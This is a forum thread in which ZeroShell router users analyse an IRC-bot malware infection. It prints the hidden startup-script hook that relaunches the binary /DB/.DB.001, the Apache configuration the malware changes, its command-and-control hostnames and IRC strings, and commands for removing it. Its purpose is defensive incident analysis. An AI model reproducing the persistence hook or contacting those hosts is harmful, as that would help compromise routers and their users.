www.zeroshell.org Forum Index www.zeroshell.org
Linux Distribution for server and embedded devices
 
 SearchSearch  RegisterRegister  UsergroupsUsergroups 
 ProfileProfile  Log inLog in  Log in to check your private messagesPrivate Message 

DoS on DNS Zeroshell: Malware!

 
Post new topic   Reply to topic    www.zeroshell.org Forum Index -> ZeroShell
View previous topic :: View next topic  
Author Message
fsala



Joined: 06 Nov 2013
Posts: 3

PostPosted: Wed Nov 06, 2013 3:50 pm    Post subject: DoS on DNS Zeroshell: Malware! Reply with quote

Hi all,
I found a malware on one of our ZS board, that create DoS on Zeroshell DNS with 20k connections on it.

Full analysis on the italian board (sorry, Italian only, I'll translate it in a while...): http://www.zeroshell.net/forum/viewtopic.php?t=4115
Back to top
View user's profile Send private message
fsala



Joined: 06 Nov 2013
Posts: 3

PostPosted: Wed Nov 06, 2013 3:59 pm    Post subject: Reply with quote

In short:

Issue is in a running hidden executable (/DB/.DB.001) that opens thousands of connections to the DNS Exclamation.
File attributes are made to hide it and make deletion harder.

Code:

root@zeroshell DB> ls -al
total 131252
drwxr-xr-x    4 root     root         4096 Oct 21 17:09 .
drwxr-xr-x   21 root     root          520 Nov  6 12:55 ..
-rwxr-xr-x    1 root     root        23289 Nov 21  2012 .DB.001
drwxr-xr-x    7 root     root         4096 Jul  2  2012 _DB.001
drwx------    2 root     root        16384 Apr 20  2011 lost+found
-rw-r--r--    1 root     root     134217728 Apr 20  2011 swap-file

root@zeroshell DB> lsattr .DB.001
-u--ia--------- .DB.001


To deactivate/rename it:
Code:

killall -9 .DB.001 ; chattr -iua .DB.001 ; mv .DB.001 DB-malware


I analyzed the activity with "strace": there are thousands of connections to DNS with query for "zeroshell.will.mx" and "zeroshell.samhan.biz" and the binary contains code to activate IRC connection (like a lot of worms).

Executable starts at boot, inside "Database Update" script (you find it in the Startup/Cron area) and is scheduled to restart every 2 minutes.
Code:

# SSL Security Check
Security=$(cat /etc/httpd/ssl.conf | grep C100-Security-Fix-beta12)
if [ -z "$Security" ] && [ -f "/Database/var/register/system/ssl/ssl.conf" ]; then
        cp -rf /Database/var/register/system/ssl/ssl.conf /etc/httpd/ssl.conf
        httpd=$(pidof httpd);kill -HUP $httpd
fi

# Database Update
Database=$(pidof .DB.001)
if [ -z "$Database" ]; then
        /DB/.DB.001
fi
echo "OK"


It changes also SSL configuration of Apache:
Code:

#     C100-Security-Fix-beta12
<Directory "/usr/local/apache2/cgi-bin">
    SSLOptions +StdEnvVars
        RewriteEngine On
        RewriteCond %{REQUEST_METHOD} GET
        RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
        RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(//?)+ [OR]
        RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR]
        RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC]
        RewriteRule .* - [F]
</Directory>


The binary payload contains this kind of strings (IRC connection, browser emulation...), so I'm sure it's a malware:

Code:

zeroshell.will.mx
zeroshell.samhan.biz
r/usr/dict/words%s : USERID : UNIX : %s
http://GET /%s HTTP/1.0
User-Agent: Mozilla/4.75 (X11; U; Linux 2.2.16-3 i686)
NICK %s
 HELPIRC SH export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%sNOTICE %s :%s
MODE %s -xi
JOIN %s :%s
WHO %s
PONG %s
352376433422PRIVMSGPINGNICKmkdir /tmp/lol/lib/kw+#z1zNICK %s
USER %s localhost localhost


At the moment, I don't know what was the infection entry point, but I suspect a bug in the openSSL library or in that area...

Hope it helps!

Fabrizio Sala/Netdream
Back to top
View user's profile Send private message
bbozo



Joined: 31 Mar 2008
Posts: 46
Location: Srbija

PostPosted: Thu Dec 05, 2013 1:34 pm    Post subject: also infected Reply with quote

ZS 1 b16
ZS 2 rc2
almost all my routers (4 of 5) where infected

Is there going to be some kind of patch?

fsala thank you!!!!
_________________
Mej d fors bi vit ju!!!
Back to top
View user's profile Send private message
drsox



Joined: 09 Jan 2014
Posts: 13

PostPosted: Thu Jan 09, 2014 8:13 pm    Post subject: Reply with quote

I've found one of my installations infected with this too.

Can we try and narrow down what we have in common to work out the infection method.

I am running Release 2.0.RC2 setup and running since circa. 17/02/2013

I have (open to the world):
-Port 80 (the web interface)
-Port 443 (the web interface)
-Some LAN-to-LAN (OpenVPN) connections.
Code:
-rwxr-xr-x    1 root     root        23289 Nov 21  2012 .DB.001

Yet other installations have not been infected.
OK Installation 1 = Release 2.0.RC2 / Port 80 (Zeroshell server) only open to the world (Port 443 is blocked) running for about a year.

OK Installation 2 = Release 2.0.RC2 / No ports open to the world running for about 2 months

OK Installation 3 = Release 2.0.RC1 / Port 80, 443 and SSH open to the world running for about a year

Both the hosts referenced in the copy I have are the same as the OP.
zeroshell.will.mx
and
zeroshell.samhan.biz
Luckily both of these don't resolve and given the date on the infection I presume this must be a very, very old infection that we've only just discovered.
Code:
root@zeroshell DB> pstree -Gp
init(1)─┬─.DB.001(14049)
root@zeroshell DB> ps aux | grep 14049
root      7832  0.0  0.0  1944  244 pts/0    S    03:33   0:00 grep 14049
root     14049  0.0  0.2  2036  640 ?        S     2013  64:09 sleep 1800


I slayed and reloaded the process and it spawned two of itself and instantly tries to resolve zeroshell.will.mx and zeroshell.samhan.biz.
I forced my network to respond with an IP and the infection then tries to contact zeroshell.will.mx on port 53 using TCP using the IRC protocol:
Code:
NICK WORO
USER DCRK localhost localhost :VQYJWO

Tom - www.mouselike.org
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    www.zeroshell.org Forum Index -> ZeroShell All times are GMT
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2005 phpBB Group